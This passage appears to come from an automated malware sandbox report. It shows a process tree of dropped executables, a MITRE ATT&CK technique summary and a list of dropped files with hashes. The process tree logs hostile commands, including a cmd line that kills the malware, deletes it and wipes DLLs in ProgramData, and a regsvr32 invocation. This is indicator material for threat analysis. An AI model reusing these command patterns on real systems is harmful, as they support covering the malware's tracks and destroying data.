                                                                                                                                                                                regsvr32 ..\BkZz.p /u -S
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:4420
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /IM "DC52.exe" -F
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4156
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DD2D.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DD2D.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:1964
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im DD2D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DD2D.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3928
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im DD2D.exe /f
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4344
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /t 6
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:5096
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DEA5.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DEA5.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:3388
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DEA5.exe
                                                                                                                                                                          "{path}"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:204
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DEA5.exe
                                                                                                                                                                            "{path}"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6068
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2840
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4760
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E6A9.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E6A9.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                PID:3800
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im E6A9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E6A9.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4956
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /im E6A9.exe /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4904
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:5932

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Execution

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Persistence

                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                1
                                                                                                                                                                                T1031

                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                2
                                                                                                                                                                                T1060

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                1
                                                                                                                                                                                T1197

                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                Modify Registry

                                                                                                                                                                                5
                                                                                                                                                                                T1112

                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                3
                                                                                                                                                                                T1089

                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                1
                                                                                                                                                                                T1497

                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                1
                                                                                                                                                                                T1197

                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                1
                                                                                                                                                                                T1130

                                                                                                                                                                                Credential Access

                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                3
                                                                                                                                                                                T1081

                                                                                                                                                                                Discovery

                                                                                                                                                                                Query Registry

                                                                                                                                                                                6
                                                                                                                                                                                T1012

                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                1
                                                                                                                                                                                T1497

                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                6
                                                                                                                                                                                T1082

                                                                                                                                                                                Security Software Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1063

                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1120

                                                                                                                                                                                Collection

                                                                                                                                                                                Data from Local System

                                                                                                                                                                                3
                                                                                                                                                                                T1005

                                                                                                                                                                                Command and Control

                                                                                                                                                                                Web Service

                                                                                                                                                                                1
                                                                                                                                                                                T1102

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                  MD5

                                                                                                                                                                                  213e00f202cd18120a1e44ea3a93d267

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ff07223275c627f04f64b8dc691a2e9eb0239883

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1ba80ea646c4375e8c7aa286eb25600013d13540d3324996db6a824d0ef9a7ae

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a4c9c443341d3943c9453ac1237e54f70f942a5c3c6032e86b942d8d16b8acffe61c0f3c1feec9d90d926be147e4272b477f423c830bee09287abf67596e78b2

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                  MD5

                                                                                                                                                                                  35a5ab71990f411955cba00ae4dcc346

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c69ae00c634b1a9f0d90eb7564e2f14fcf5114bc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5fbdd9a6cf0bc06c5e9d51ce01bb0e537a7581627be1420b29e36dec46067eee

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  af70223952937f8eeb4d79b63367da28cfec1f9fa296966176ff574d20702443f8e1209633b9505232640ea4442f251b830e51b4c8acc3dba67b28ecf5b4a5d5

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1694c39201203cb9f42cf3c90859feeb

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4469ac8820e4fad24bbfef36c30835e9db809345

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7ca43bdd55a16f3164da7aed2ea4ca0e5393c8e6019f054dcf66630e340a9e5f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5e634685bd9d156398d12b4b7328715aedb39589c79b103dc872bc86aafc5047b4fd853e186c3853d4c4780aa01f403914b6a956b2e3a4e10829b683d791d94b

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                  MD5

                                                                                                                                                                                  7cb77eb6413aefe6caa3418d11b6fe70

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  475a9203a9c9670550c147d5300222b4e4a3f181

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0c9ce40fc51048bd5c031f3134134f87367d8fd9c1ab6870abb735b10fd8046e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c0119f59206f017058138bb736c4c6478f2f3fdbe6fca27fca0b285422b7749f15c4316c5106a8a2d694103e700249ae24ab6fff27021eb77a7863acde2d59af

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\libcurl.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\libcurlpp.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\libgcc_s_dw2-1.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\libstdc++-6.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\libwinpthread-1.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\setup_install.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\setup_install.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_1.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_2.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_2.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_3.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_3.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_4.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_4.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_5.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_5.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_6.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48C06454\sonia_6.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  a6279ec92ff948760ce53bba817d6a77

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5345505e12f9e4c6d569a226d50e71b5a572dce2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  a6279ec92ff948760ce53bba817d6a77

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5345505e12f9e4c6d569a226d50e71b5a572dce2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1ffc3f7384d85e1b554b60b75cf9573e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2bf44021f74b131174bd5645dba0adc0fff2072d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a405ebaa9ba0ca575bdef8240e706a50eacd4c77e70ce4985e27d5ac95c35cfe

                                                                                                                                                                                  SHA512

